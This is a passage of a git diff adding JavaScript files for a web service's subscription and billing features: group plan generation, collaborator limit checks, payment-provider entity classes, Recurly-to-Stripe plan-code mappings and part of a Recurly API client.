b/services/web/app/src/Features/Subscription/GroupPlansData.js @@ -0,0 +1,69 @@ +const Settings = require('@overleaf/settings') +const fs = require('fs') +const Path = require('path') + +// The groups.json file encodes the various group plan options we provide, and +// is used in the app the render the appropriate dialog in the plans page, and +// to generate the appropriate entries in the Settings.plans array. +// It is also used by scripts/recurly/sync_recurly.rb, which will make sure +// Recurly has a plan configured for all the groups, and that the prices are +// up to date with the data in groups.json. +// Alternatively, scripts/recurly/get_recurly_group_prices.rb can be used to +// fetch pricing data and generate a groups.json using the current Recurly +// prices +const data = fs.readFileSync( + Path.join(__dirname, '/../../../templates/plans/groups.json') +) +const groups = JSON.parse(data.toString()) + +const capitalize = string => string.charAt(0).toUpperCase() + string.slice(1) + +// With group accounts in Recurly, we end up with a lot of plans to manage. +// Rather than hand coding them in the settings file, and then needing to keep +// that data in sync with the data in groups.json, we can auto generate the +// group plan entries and append them to Settings.plans at boot time. 
This is not +// a particularly clean pattern, since it's a little surprising that settings +// are modified at boot-time, but I think it's a better option than trying to +// keep two sources of data in sync. +for (const [usage, planData] of Object.entries(groups)) { + for (const [planCode, currencyData] of Object.entries(planData)) { + // Gather all possible sizes that are set up in at least one currency + const sizes = new Set() + for (const priceData of Object.values(currencyData)) { + for (const size in priceData) { + sizes.add(size) + } + } + + const planName = + planCode === 'collaborator' + ? 'Standard (Collaborator)' + : capitalize(planCode) + + // Generate plans in settings + for (const size of sizes) { + const plan = { + planCode: `group_${planCode}_${size}_${usage}`, + name: `${ + Settings.appName + } ${planName} - Group Account (${size} licenses) - ${capitalize( + usage + )}`, + hideFromUsers: true, + price_in_cents: groups[usage][planCode].USD[size].price_in_cents, + annual: true, + features: Settings.features[planCode], + groupPlan: true, + membersLimit: parseInt(size), + // Add the `membersLimitAddOn` to all group plans + membersLimitAddOn: 'additional-license', + // Unlock flexible licensing for all group plans + canUseFlexibleLicensing: true, + } + + Settings.plans.push(plan) + } + } +} + +module.exports = groups diff --git a/services/web/app/src/Features/Subscription/GroupUtils.js b/services/web/app/src/Features/Subscription/GroupUtils.js new file mode 100644 index 0000000..55aea1a --- /dev/null +++ b/services/web/app/src/Features/Subscription/GroupUtils.js @@ -0,0 +1,14 @@ +// ts-check +/** + * Builds a group subscription's `providerId` to be used to identify SAML identifiers + * belonging to this group. + * @param {string | import('mongodb').ObjectId} subscriptionId + * @returns {string} + */ +function getProviderId(subscriptionId) { + return `ol-group-subscription-id:${subscriptionId.toString()}` +} + +module.exports = { + getProviderId, +} diff --git a/services/web/app/src/Features/Subscription/LimitationsManager.js b/services/web/app/src/Features/Subscription/LimitationsManager.js new file mode 100644 index 0000000..d0c3d29 --- /dev/null +++ b/services/web/app/src/Features/Subscription/LimitationsManager.js @@ -0,0 +1,215 @@ +// @ts-check + +const logger = require('@overleaf/logger') +const ProjectGetter = require('../Project/ProjectGetter') +const UserGetter = require('../User/UserGetter') +const SubscriptionLocator = require('./SubscriptionLocator') +const Settings = require('@overleaf/settings') +const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') +const CollaboratorsInvitesGetter = require('../Collaborators/CollaboratorsInviteGetter') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const { + callbackify, + callbackifyMultiResult, +} = require('@overleaf/promise-utils') + +async function allowedNumberOfCollaboratorsInProject(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: true, + }) + return await allowedNumberOfCollaboratorsForUser(project.owner_ref) +} + +async function allowedNumberOfCollaboratorsForUser(userId) { + const user = await UserGetter.promises.getUser(userId, { features: 1 }) + if (user.features && user.features.collaborators) { + return user.features.collaborators + } else { + return Settings.defaultFeatures.collaborators + } +} + +async function canAcceptEditCollaboratorInvite(projectId) { + const allowedNumber = await 
allowedNumberOfCollaboratorsInProject(projectId) + if (allowedNumber < 0) { + return true // -1 means unlimited + } + const currentEditors = + await CollaboratorsGetter.promises.getInvitedEditCollaboratorCount( + projectId + ) + return currentEditors + 1 <= allowedNumber +} + +async function canAddXEditCollaborators( + projectId, + numberOfNewEditCollaborators +) { + const allowedNumber = await allowedNumberOfCollaboratorsInProject(projectId) + if (allowedNumber < 0) { + return true // -1 means unlimited + } + const currentEditors = + await CollaboratorsGetter.promises.getInvitedEditCollaboratorCount( + projectId + ) + const editInviteCount = + await CollaboratorsInvitesGetter.promises.getEditInviteCount(projectId) + return ( + currentEditors + editInviteCount + numberOfNewEditCollaborators <= + allowedNumber + ) +} + +/** + * Check whether a collaborator can be switched to the given privilege level + * + * @param {string} projectId + * @param {string} userId + * @param {'readOnly' | 'review' | 'readAndWrite'} privilegeLevel + * @return {Promise<boolean>} + */ +async function canChangeCollaboratorPrivilegeLevel( + projectId, + userId, + privilegeLevel +) { + if (privilegeLevel === PrivilegeLevels.READ_ONLY) { + return true + } + + const currentPrivilegeLevel = + await CollaboratorsGetter.promises.getMemberIdPrivilegeLevel( + userId, + projectId + ) + if ( + currentPrivilegeLevel === PrivilegeLevels.READ_AND_WRITE || + currentPrivilegeLevel === PrivilegeLevels.REVIEW + ) { + // Current collaborator already takes a slot, so changing the privilege + // level won't increase the collaborator count + return true + } + + const allowedNumber = await allowedNumberOfCollaboratorsInProject(projectId) + if (allowedNumber < 0) { + // -1 means unlimited + return true + } + + const slotsTaken = + await CollaboratorsGetter.promises.getInvitedEditCollaboratorCount( + projectId + ) + const inviteCount = + await CollaboratorsInvitesGetter.promises.getEditInviteCount(projectId) + + return slotsTaken + inviteCount < allowedNumber +} + +async function hasPaidSubscription(user) { + const { hasSubscription, subscription } = await userHasSubscription(user) + const { isMember } = await userIsMemberOfGroupSubscription(user) + return { + hasPaidSubscription: hasSubscription || isMember, + subscription, + } +} + +// alias for backward-compatibility with modules. 
Use `hasPaidSubscription` instead
+async function userHasSubscriptionOrIsGroupMember(user) {
+  return await hasPaidSubscription(user)
+}
+
+async function userHasSubscription(user) {
+  const subscription = await SubscriptionLocator.promises.getUsersSubscription(
+    user._id
+  )
+  let hasValidSubscription = false
+  if (subscription) {
+    if (subscription.recurlySubscription_id || subscription.customAccount) {
+      hasValidSubscription = true
+    }
+  }
+  return {
+    hasSubscription: hasValidSubscription,
+    subscription,
+  }
+}
+
+async function userIsMemberOfGroupSubscription(user) {
+  const subscriptions =
+    (await SubscriptionLocator.promises.getMemberSubscriptions(user._id)) || []
+  return { isMember: subscriptions.length > 0, subscriptions }
+}
+
+function teamHasReachedMemberLimit(subscription) {
+  const currentTotal =
+    (subscription.member_ids || []).length +
+    (subscription.teamInvites || []).length +
+    (subscription.invited_emails || []).length
+
+  return currentTotal >= subscription.membersLimit
+}
+
+async function hasGroupMembersLimitReached(subscriptionId) {
+  const subscription =
+    await SubscriptionLocator.promises.getSubscription(subscriptionId)
+  if (!subscription) {
+    logger.warn({ subscriptionId }, 'no subscription found')
+    throw new Error('no subscription found')
+  }
+  const limitReached = teamHasReachedMemberLimit(subscription)
+  return { limitReached, subscription }
+}
+
+const LimitationsManager = {
+  allowedNumberOfCollaboratorsInProject: callbackify(
+    allowedNumberOfCollaboratorsInProject
+  ),
+  allowedNumberOfCollaboratorsForUser: callbackify(
+    allowedNumberOfCollaboratorsForUser
+  ),
+  canAddXEditCollaborators: callbackify(canAddXEditCollaborators),
+  canChangeCollaboratorPrivilegeLevel: callbackify(
+    canChangeCollaboratorPrivilegeLevel
+  ),
+  hasPaidSubscription: callbackifyMultiResult(hasPaidSubscription, [
+    'hasPaidSubscription',
+    'subscription',
+  ]),
+  userHasSubscriptionOrIsGroupMember: callbackifyMultiResult(
+    userHasSubscriptionOrIsGroupMember,
+    ['hasPaidSubscription', 'subscription']
+  ),
+  userHasSubscription: callbackifyMultiResult(userHasSubscription, [
+    'hasSubscription',
+    'subscription',
+  ]),
+  userIsMemberOfGroupSubscription: callbackifyMultiResult(
+    userIsMemberOfGroupSubscription,
+    ['isMember', 'subscriptions']
+  ),
+  hasGroupMembersLimitReached: callbackifyMultiResult(
+    hasGroupMembersLimitReached,
+    ['limitReached', 'subscription']
+  ),
+
+  teamHasReachedMemberLimit,
+
+  promises: {
+    allowedNumberOfCollaboratorsInProject,
+    allowedNumberOfCollaboratorsForUser,
+    canAcceptEditCollaboratorInvite,
+    canAddXEditCollaborators,
+    canChangeCollaboratorPrivilegeLevel,
+    hasPaidSubscription,
+    userHasSubscriptionOrIsGroupMember,
+    userHasSubscription,
+    userIsMemberOfGroupSubscription,
+    hasGroupMembersLimitReached,
+  },
+}
+
+module.exports = LimitationsManager
diff --git a/services/web/app/src/Features/Subscription/PaymentProviderEntities.js b/services/web/app/src/Features/Subscription/PaymentProviderEntities.js
new file mode 100644
index 0000000..472747e
--- /dev/null
+++ b/services/web/app/src/Features/Subscription/PaymentProviderEntities.js
@@ -0,0 +1,521 @@
+// @ts-check
+
+const OError = require('@overleaf/o-error')
+const { DuplicateAddOnError, AddOnNotPresentError } = require('./Errors')
+const PlansLocator = require('./PlansLocator')
+const SubscriptionHelper = require('./SubscriptionHelper')
+
+const AI_ADD_ON_CODE = 'assistant'
+const MEMBERS_LIMIT_ADD_ON_CODE = 'additional-license'
+const STANDALONE_AI_ADD_ON_CODES = 
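
To illustrate the dual API that `callbackifyMultiResult` wires up above (an aside, not from the diff): promise callers get the whole result object, while callback callers receive the listed field names back as positional arguments. `subscriptionId` is a placeholder.

const LimitationsManager = require('./LimitationsManager')

async function example(subscriptionId) {
  // Promise style:
  const { limitReached, subscription } =
    await LimitationsManager.promises.hasGroupMembersLimitReached(
      subscriptionId
    )

  // Callback style, as older modules still call it:
  LimitationsManager.hasGroupMembersLimitReached(
    subscriptionId,
    (err, limitReached, subscription) => {
      if (err) {
        return
      }
      // ...
    }
  )
}
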
['assistant', 'assistant-annual']
+
+class PaymentProviderSubscription {
+  /**
+   * @param {object} props
+   * @param {string} props.id
+   * @param {string} props.userId
+   * @param {string} props.planCode
+   * @param {string} props.planName
+   * @param {number} props.planPrice
+   * @param {PaymentProviderSubscriptionAddOn[]} [props.addOns]
+   * @param {number} props.subtotal
+   * @param {number} [props.taxRate]
+   * @param {number} [props.taxAmount]
+   * @param {string} props.currency
+   * @param {number} props.total
+   * @param {Date} props.periodStart
+   * @param {Date} props.periodEnd
+   * @param {string} props.collectionMethod
+   * @param {PaymentProviderSubscriptionChange} [props.pendingChange]
+   * @param {string} [props.service]
+   * @param {string} [props.state]
+   * @param {Date|null} [props.trialPeriodEnd]
+   * @param {Date|null} [props.pausePeriodStart]
+   * @param {number|null} [props.remainingPauseCycles]
+   */
+  constructor(props) {
+    this.id = props.id
+    this.userId = props.userId
+    this.planCode = props.planCode
+    this.planName = props.planName
+    this.planPrice = props.planPrice
+    this.addOns = props.addOns ?? []
+    this.subtotal = props.subtotal
+    this.taxRate = props.taxRate ?? 0
+    this.taxAmount = props.taxAmount ?? 0
+    this.currency = props.currency
+    this.total = props.total
+    this.periodStart = props.periodStart
+    this.periodEnd = props.periodEnd
+    this.collectionMethod = props.collectionMethod
+    this.pendingChange = props.pendingChange ?? null
+    this.service = props.service ?? 'recurly'
+    this.state = props.state ?? 'active'
+    this.trialPeriodEnd = props.trialPeriodEnd ?? null
+    this.pausePeriodStart = props.pausePeriodStart ?? null
+    this.remainingPauseCycles = props.remainingPauseCycles ?? null
+  }
+
+  /**
+   * Returns whether this subscription currently has the given add-on
+   *
+   * @param {string} code
+   * @return {boolean}
+   */
+  hasAddOn(code) {
+    return this.addOns.some(addOn => addOn.code === code)
+  }
+
+  /**
+   * Returns whether this subscription is a standalone AI add-on subscription
+   *
+   * @return {boolean}
+   */
+  isStandaloneAiAddOn() {
+    return isStandaloneAiAddOnPlanCode(this.planCode)
+  }
+
+  /**
+   * Returns whether this subscription will have the given add-on next billing
+   * period.
+   *
+   * There are two cases: either the subscription already has the add-on and
+   * won't change next period, or the subscription will change next period and
+   * the change includes the add-on.
+   *
+   * @param {string} code
+   * @return {boolean}
+   */
+  hasAddOnNextPeriod(code) {
+    if (this.pendingChange != null) {
+      return this.pendingChange.nextAddOns.some(addOn => addOn.code === code)
+    } else {
+      return this.hasAddOn(code)
+    }
+  }
+
+  /**
+   * Change this subscription's plan
+   *
+   * @param {string} planCode
+   * @return {PaymentProviderSubscriptionChangeRequest}
+   */
+  getRequestForPlanChange(planCode) {
+    const currentPlan = PlansLocator.findLocalPlanInSettings(this.planCode)
+    if (currentPlan == null) {
+      throw new OError('Unable to find plan in settings', {
+        planCode: this.planCode,
+      })
+    }
+    const newPlan = PlansLocator.findLocalPlanInSettings(planCode)
+    if (newPlan == null) {
+      throw new OError('Unable to find plan in settings', { planCode })
+    }
+    const shouldChangeAtTermEnd = SubscriptionHelper.shouldPlanChangeAtTermEnd(
+      currentPlan,
+      newPlan
+    )
+
+    const changeRequest = new PaymentProviderSubscriptionChangeRequest({
+      subscription: this,
+      timeframe: shouldChangeAtTermEnd ? 
'term_end' : 'now', + planCode, + }) + + // Carry the AI add-on to the new plan if applicable + if ( + this.isStandaloneAiAddOn() || + (!shouldChangeAtTermEnd && this.hasAddOn(AI_ADD_ON_CODE)) || + (shouldChangeAtTermEnd && this.hasAddOnNextPeriod(AI_ADD_ON_CODE)) + ) { + const addOnUpdate = new PaymentProviderSubscriptionAddOnUpdate({ + code: AI_ADD_ON_CODE, + quantity: 1, + }) + changeRequest.addOnUpdates = [addOnUpdate] + } + + return changeRequest + } + + /** + * Purchase an add-on on this subscription + * + * @param {string} code + * @param {number} [quantity] + * @param {number} [unitPrice] + * @return {PaymentProviderSubscriptionChangeRequest} - the change request to send to + * Recurly + * + * @throws {DuplicateAddOnError} if the add-on is already present on the subscription + */ + getRequestForAddOnPurchase(code, quantity = 1, unitPrice) { + if (this.hasAddOn(code)) { + throw new DuplicateAddOnError('Subscription already has add-on', { + subscriptionId: this.id, + addOnCode: code, + }) + } + + const addOnUpdates = this.addOns.map(addOn => addOn.toAddOnUpdate()) + addOnUpdates.push( + new PaymentProviderSubscriptionAddOnUpdate({ code, quantity, unitPrice }) + ) + return new PaymentProviderSubscriptionChangeRequest({ + subscription: this, + timeframe: 'now', + addOnUpdates, + }) + } + + /** + * Update an add-on on this subscription + * + * @param {string} code + * @param {number} quantity + * @return {PaymentProviderSubscriptionChangeRequest} - the change request to send to + * Recurly + * + * @throws {AddOnNotPresentError} if the subscription doesn't have the add-on + */ + getRequestForAddOnUpdate(code, quantity) { + if (!this.hasAddOn(code)) { + throw new AddOnNotPresentError( + 'Subscription does not have add-on to update', + { + subscriptionId: this.id, + addOnCode: code, + } + ) + } + + const addOnUpdates = this.addOns.map(addOn => { + const update = addOn.toAddOnUpdate() + + if (update.code === code) { + update.quantity = quantity + } + + return update + }) + + return new PaymentProviderSubscriptionChangeRequest({ + subscription: this, + timeframe: 'now', + addOnUpdates, + }) + } + + /** + * Remove an add-on from this subscription + * + * @param {string} code + * @return {PaymentProviderSubscriptionChangeRequest} + * + * @throws {AddOnNotPresentError} if the subscription doesn't have the add-on + */ + getRequestForAddOnRemoval(code) { + if (!this.hasAddOn(code)) { + throw new AddOnNotPresentError( + 'Subscription does not have add-on to remove', + { + subscriptionId: this.id, + addOnCode: code, + } + ) + } + const addOnUpdates = this.addOns + .filter(addOn => addOn.code !== code) + .map(addOn => addOn.toAddOnUpdate()) + return new PaymentProviderSubscriptionChangeRequest({ + subscription: this, + timeframe: 'term_end', + addOnUpdates, + }) + } + + /** + * Upgrade group plan with the plan code provided + * + * @param {string} newPlanCode + * @return {PaymentProviderSubscriptionChangeRequest} + */ + getRequestForGroupPlanUpgrade(newPlanCode) { + // Ensure all the existing add-ons are added to the new plan + const addOns = this.addOns.map( + addOn => + new PaymentProviderSubscriptionAddOnUpdate({ + code: addOn.code, + quantity: addOn.quantity, + }) + ) + + return new PaymentProviderSubscriptionChangeRequest({ + subscription: this, + timeframe: 'now', + addOnUpdates: addOns, + planCode: newPlanCode, + }) + } + + /** + * Returns whether this subscription is manually collected + * + * @return {boolean} + */ + get isCollectionMethodManual() { + return this.collectionMethod === 
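
An illustrative sketch of driving the change-request builders above (not part of the diff). It assumes `subscription` is already a `PaymentProviderSubscription` instance.

const { AI_ADD_ON_CODE } = require('./PaymentProviderEntities')
const { DuplicateAddOnError } = require('./Errors')

function buildAiAssistPurchase(subscription) {
  try {
    // Purchases take effect immediately ('now'); removals above are
    // scheduled for 'term_end' instead.
    return subscription.getRequestForAddOnPurchase(AI_ADD_ON_CODE)
  } catch (err) {
    if (err instanceof DuplicateAddOnError) {
      return null // the add-on is already on the subscription
    }
    throw err
  }
}
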
'manual' + } +} + +/** + * An add-on attached to a subscription + */ +class PaymentProviderSubscriptionAddOn { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.name + * @param {number} props.quantity + * @param {number} props.unitPrice + */ + constructor(props) { + this.code = props.code + this.name = props.name + this.quantity = props.quantity + this.unitPrice = props.unitPrice + this.preTaxTotal = this.quantity * this.unitPrice + } + + /** + * Return an add-on update that doesn't modify the add-on + */ + toAddOnUpdate() { + return new PaymentProviderSubscriptionAddOnUpdate({ + code: this.code, + quantity: this.quantity, + unitPrice: this.unitPrice, + }) + } +} + +class PaymentProviderSubscriptionChangeRequest { + /** + * @param {object} props + * @param {PaymentProviderSubscription} props.subscription + * @param {"now" | "term_end"} props.timeframe + * @param {string} [props.planCode] + * @param {PaymentProviderSubscriptionAddOnUpdate[]} [props.addOnUpdates] + */ + constructor(props) { + if (props.planCode == null && props.addOnUpdates == null) { + throw new OError('Invalid PaymentProviderSubscriptionChangeRequest', { + props, + }) + } + this.subscription = props.subscription + this.timeframe = props.timeframe + this.planCode = props.planCode ?? null + this.addOnUpdates = props.addOnUpdates ?? null + } +} + +class PaymentProviderSubscriptionAddOnUpdate { + /** + * @param {object} props + * @param {string} props.code + * @param {number} [props.quantity] + * @param {number} [props.unitPrice] + */ + constructor(props) { + this.code = props.code + this.quantity = props.quantity ?? null + this.unitPrice = props.unitPrice ?? null + } +} + +class PaymentProviderSubscriptionChange { + /** + * @param {object} props + * @param {PaymentProviderSubscription} props.subscription + * @param {string} props.nextPlanCode + * @param {string} props.nextPlanName + * @param {number} props.nextPlanPrice + * @param {PaymentProviderSubscriptionAddOn[]} props.nextAddOns + * @param {PaymentProviderImmediateCharge} [props.immediateCharge] + */ + constructor(props) { + this.subscription = props.subscription + this.nextPlanCode = props.nextPlanCode + this.nextPlanName = props.nextPlanName + this.nextPlanPrice = props.nextPlanPrice + this.nextAddOns = props.nextAddOns + this.immediateCharge = + props.immediateCharge ?? 
+ new PaymentProviderImmediateCharge({ + subtotal: 0, + tax: 0, + total: 0, + discount: 0, + }) + + this.subtotal = this.nextPlanPrice + for (const addOn of this.nextAddOns) { + this.subtotal += addOn.preTaxTotal + } + + this.tax = Math.round(this.subtotal * 100 * this.subscription.taxRate) / 100 + + this.total = this.subtotal + this.tax + } + + getAddOn(addOnCode) { + return this.nextAddOns.find(addOn => addOn.code === addOnCode) + } +} + +class PaypalPaymentMethod { + toString() { + return 'Paypal' + } +} + +class CreditCardPaymentMethod { + /** + * @param {object} props + * @param {string} props.cardType + * @param {string} props.lastFour + */ + constructor(props) { + this.cardType = props.cardType + this.lastFour = props.lastFour + } + + toString() { + return `${this.cardType} **** ${this.lastFour}` + } +} + +class PaymentProviderImmediateCharge { + /** + * @param {object} props + * @param {number} props.subtotal + * @param {number} props.tax + * @param {number} props.total + * @param {number} props.discount + */ + constructor(props) { + this.subtotal = props.subtotal + this.tax = props.tax + this.total = props.total + this.discount = props.discount + } +} + +/** + * An add-on configuration, independent of any subscription + */ +class PaymentProviderAddOn { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.name + */ + constructor(props) { + this.code = props.code + this.name = props.name + } +} + +/** + * A plan configuration + */ +class PaymentProviderPlan { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.name + */ + constructor(props) { + this.code = props.code + this.name = props.name + } +} + +/** + * A coupon in the payment provider + */ +class PaymentProviderCoupon { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.name + * @param {string} props.description + */ + constructor(props) { + this.code = props.code + this.name = props.name + this.description = props.description + } +} + +/** + * An account in the payment provider + */ +class PaymentProviderAccount { + /** + * @param {object} props + * @param {string} props.code + * @param {string} props.email + * @param {boolean} props.hasPastDueInvoice + */ + constructor(props) { + this.code = props.code + this.email = props.email + this.hasPastDueInvoice = props.hasPastDueInvoice ?? 
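
To make the rounding in `PaymentProviderSubscriptionChange` above concrete, a worked example with made-up figures: a 21.00 plan, one 5.90 add-on line, and a 20% tax rate.

const subtotal = 21.0 + 5.9 // 26.9: plan price plus the add-on's preTaxTotal
// Same formula as `Math.round(this.subtotal * 100 * this.subscription.taxRate) / 100`:
const tax = Math.round(subtotal * 100 * 0.2) / 100 // 5.38
const total = subtotal + tax // 32.28
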
false
+  }
+}
+
+/**
+ * Returns whether the given plan code is a standalone AI plan
+ *
+ * @param {string} planCode
+ */
+function isStandaloneAiAddOnPlanCode(planCode) {
+  return STANDALONE_AI_ADD_ON_CODES.includes(planCode)
+}
+
+/**
+ * Returns whether the subscription change will have the AI bundle once the change is processed
+ *
+ * @param {PaymentProviderSubscriptionChange} subscriptionChange The subscription change object coming from payment provider
+ *
+ * @return {boolean}
+ */
+function subscriptionChangeIsAiAssistUpgrade(subscriptionChange) {
+  return Boolean(
+    isStandaloneAiAddOnPlanCode(subscriptionChange.nextPlanCode) ||
+      subscriptionChange.nextAddOns?.some(
+        addOn => addOn.code === AI_ADD_ON_CODE
+      )
+  )
+}
+
+module.exports = {
+  AI_ADD_ON_CODE,
+  MEMBERS_LIMIT_ADD_ON_CODE,
+  STANDALONE_AI_ADD_ON_CODES,
+  PaymentProviderSubscription,
+  PaymentProviderSubscriptionAddOn,
+  PaymentProviderSubscriptionChange,
+  PaymentProviderSubscriptionChangeRequest,
+  PaymentProviderSubscriptionAddOnUpdate,
+  PaypalPaymentMethod,
+  CreditCardPaymentMethod,
+  PaymentProviderAddOn,
+  PaymentProviderPlan,
+  PaymentProviderCoupon,
+  PaymentProviderAccount,
+  isStandaloneAiAddOnPlanCode,
+  subscriptionChangeIsAiAssistUpgrade,
+  PaymentProviderImmediateCharge,
+}
diff --git a/services/web/app/src/Features/Subscription/PlansHelper.mjs b/services/web/app/src/Features/Subscription/PlansHelper.mjs
new file mode 100644
index 0000000..aa23a8d
--- /dev/null
+++ b/services/web/app/src/Features/Subscription/PlansHelper.mjs
@@ -0,0 +1,21 @@
+import FeaturesHelper from './FeaturesHelper.js'
+import PlanLocator from './PlansLocator.js'
+
+export function isProfessionalPlan(planCode) {
+  const plan = PlanLocator.findLocalPlanInSettings(planCode)
+  // only identify "modern" professional group plans as eligible, and do not include legacy plans
+  return Boolean(
+    planCode?.includes('professional') &&
+      FeaturesHelper.getMatchedFeatureSet(plan?.features) === 'professional'
+  )
+}
+
+export function isProfessionalGroupPlan(subscription) {
+  const isProfessional = isProfessionalPlan(subscription.planCode)
+  return subscription.groupPlan && isProfessional
+}
+
+export default {
+  isProfessionalPlan,
+  isProfessionalGroupPlan,
+}
diff --git a/services/web/app/src/Features/Subscription/PlansLocator.js b/services/web/app/src/Features/Subscription/PlansLocator.js
new file mode 100644
index 0000000..905fa7e
--- /dev/null
+++ b/services/web/app/src/Features/Subscription/PlansLocator.js
@@ -0,0 +1,104 @@
+// TODO: This file may be deleted once Stripe is fully rolled out to all users, so consider removing it then
+const Settings = require('@overleaf/settings')
+const logger = require('@overleaf/logger')
+
+/**
+ * @typedef {import('../../../../types/subscription/plan').RecurlyPlanCode} RecurlyPlanCode
+ * @typedef {import('../../../../types/subscription/plan').StripeLookupKey} StripeLookupKey
+ */
+
+function ensurePlansAreSetupCorrectly() {
+  Settings.plans.forEach(plan => {
+    if (typeof plan.price_in_cents !== 'number') {
+      logger.fatal({ plan }, 'missing price on plan')
+      process.exit(1)
+    }
+    if (plan.price) {
+      logger.fatal({ plan }, 'unclear price attribute on plan')
+      process.exit(1)
+    }
+    if (plan.price_in_unit) {
+      logger.fatal({ plan }, 'deprecated price_in_unit attribute on plan')
+      process.exit(1)
+    }
+  })
+}
+
+const recurlyPlanCodeToStripeLookupKey = {
+  'professional-annual': 'professional_annual',
+  professional: 'professional_monthly',
+  professional_free_trial_7_days: 'professional_monthly',
+  
'collaborator-annual': 'standard_annual', + collaborator: 'standard_monthly', + collaborator_free_trial_7_days: 'standard_monthly', + 'student-annual': 'student_annual', + student: 'student_monthly', + student_free_trial_7_days: 'student_monthly', +} + +const stripeLookupKeyToRecurlyPlanCode = { + professional_annual: 'professional-annual', + professional_monthly: 'professional', + standard_annual: 'collaborator-annual', + standard_monthly: 'collaborator', + student_annual: 'student-annual', + student_monthly: 'student', +} + +/** + * + * @param {RecurlyPlanCode} recurlyPlanCode + * @returns {StripeLookupKey} + */ +function mapRecurlyPlanCodeToStripeLookupKey(recurlyPlanCode) { + return recurlyPlanCodeToStripeLookupKey[recurlyPlanCode] +} + +/** + * @param {StripeLookupKey} stripeLookupKey + * @returns {RecurlyPlanCode} + */ +function mapStripeLookupKeyToRecurlyPlanCode(stripeLookupKey) { + return stripeLookupKeyToRecurlyPlanCode[stripeLookupKey] +} + +const recurlyPlanCodeToPlanTypeAndPeriod = { + collaborator: { planType: 'standard', period: 'monthly' }, + collaborator_free_trial_7_days: { planType: 'standard', period: 'monthly' }, + 'collaborator-annual': { planType: 'standard', period: 'annual' }, + professional: { planType: 'professional', period: 'monthly' }, + professional_free_trial_7_days: { + planType: 'professional', + period: 'monthly', + }, + 'professional-annual': { planType: 'professional', period: 'annual' }, + student: { planType: 'student', period: 'monthly' }, + student_free_trial_7_days: { planType: 'student', period: 'monthly' }, + 'student-annual': { planType: 'student', period: 'annual' }, +} + +/** + * + * @param {RecurlyPlanCode} recurlyPlanCode + * @returns {{ planType: 'standard' | 'professional' | 'student', period: 'annual' | 'monthly'}} + */ +function getPlanTypeAndPeriodFromRecurlyPlanCode(recurlyPlanCode) { + return recurlyPlanCodeToPlanTypeAndPeriod[recurlyPlanCode] +} + +function findLocalPlanInSettings(planCode) { + for (const plan of Settings.plans) { + if (plan.planCode === planCode) { + return plan + } + } + return null +} + +module.exports = { + ensurePlansAreSetupCorrectly, + findLocalPlanInSettings, + mapRecurlyPlanCodeToStripeLookupKey, + mapStripeLookupKeyToRecurlyPlanCode, + getPlanTypeAndPeriodFromRecurlyPlanCode, +} diff --git a/services/web/app/src/Features/Subscription/RecurlyClient.js b/services/web/app/src/Features/Subscription/RecurlyClient.js new file mode 100644 index 0000000..ee56487 --- /dev/null +++ b/services/web/app/src/Features/Subscription/RecurlyClient.js @@ -0,0 +1,643 @@ +// @ts-check + +const recurly = require('recurly') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { callbackify } = require('util') +const UserGetter = require('../User/UserGetter') +const { + PaymentProviderSubscription, + PaymentProviderSubscriptionAddOn, + PaymentProviderSubscriptionChange, + PaypalPaymentMethod, + CreditCardPaymentMethod, + PaymentProviderAddOn, + PaymentProviderPlan, + PaymentProviderCoupon, + PaymentProviderAccount, + PaymentProviderImmediateCharge, +} = require('./PaymentProviderEntities') +const { + MissingBillingInfoError, + SubtotalLimitExceededError, +} = require('./Errors') + +/** + * @import { PaymentProviderSubscriptionChangeRequest } from './PaymentProviderEntities' + * @import { PaymentMethod } from './types' + */ + +const recurlySettings = Settings.apis.recurly +const recurlyApiKey = recurlySettings ? 
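
A quick sketch (not part of the diff) of the mapping helpers defined above, using plan codes from the tables:

const PlansLocator = require('./PlansLocator')

PlansLocator.mapRecurlyPlanCodeToStripeLookupKey('collaborator-annual')
// => 'standard_annual'
PlansLocator.mapStripeLookupKeyToRecurlyPlanCode('standard_annual')
// => 'collaborator-annual'
PlansLocator.getPlanTypeAndPeriodFromRecurlyPlanCode('student_free_trial_7_days')
// => { planType: 'student', period: 'monthly' }
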
recurlySettings.apiKey : undefined + +const client = new recurly.Client(recurlyApiKey) + +/** + * Get account for a given user + * + * @param {string} userId + * @return {Promise<PaymentProviderAccount | null>} + */ +async function getAccountForUserId(userId) { + try { + const account = await client.getAccount(`code-${userId}`) + return accountFromApi(account) + } catch (err) { + if (err instanceof recurly.errors.NotFoundError) { + // An expected error, we don't need to handle it, just return nothing + logger.debug({ userId }, 'no recurly account found for user') + return null + } else { + throw err + } + } +} + +async function createAccountForUserId(userId) { + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + first_name: 1, + last_name: 1, + email: 1, + }) + const accountCreate = { + code: user._id.toString(), + email: user.email, + firstName: user.first_name, + lastName: user.last_name, + } + const account = await client.createAccount(accountCreate) + logger.debug({ userId, account }, 'created recurly account') + return account +} + +/** + * Get active coupons for a given user + * + * @param {string} userId + * @return {Promise<PaymentProviderCoupon[]>} + */ +async function getActiveCouponsForUserId(userId) { + try { + const redemptions = await client.listActiveCouponRedemptions( + `code-${userId}` + ) + + const coupons = [] + for await (const redemption of redemptions.each()) { + coupons.push(couponFromApi(redemption)) + } + + return coupons + } catch (err) { + // An expected error if no coupons have been redeemed + if (err instanceof recurly.errors.NotFoundError) { + return [] + } else { + throw err + } + } +} + +/** + * Get a subscription from Recurly + * + * @param {string} subscriptionId + * @return {Promise<PaymentProviderSubscription>} + */ +async function getSubscription(subscriptionId) { + const subscription = await client.getSubscription(`uuid-${subscriptionId}`) + return subscriptionFromApi(subscription) +} + +/** + * Get the subscription for a given user + * + * Returns null if the user doesn't have an account or a subscription. Throws an + * error if the user has more than one subscription. + * + * @param {string} userId + * @return {Promise<PaymentProviderSubscription | null>} + */ +async function getSubscriptionForUser(userId) { + try { + const subscriptions = client.listAccountSubscriptions(`code-${userId}`, { + params: { state: 'active', limit: 2 }, + }) + + let result = null + + // The async iterator returns a NotFoundError if the account doesn't exist. 
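
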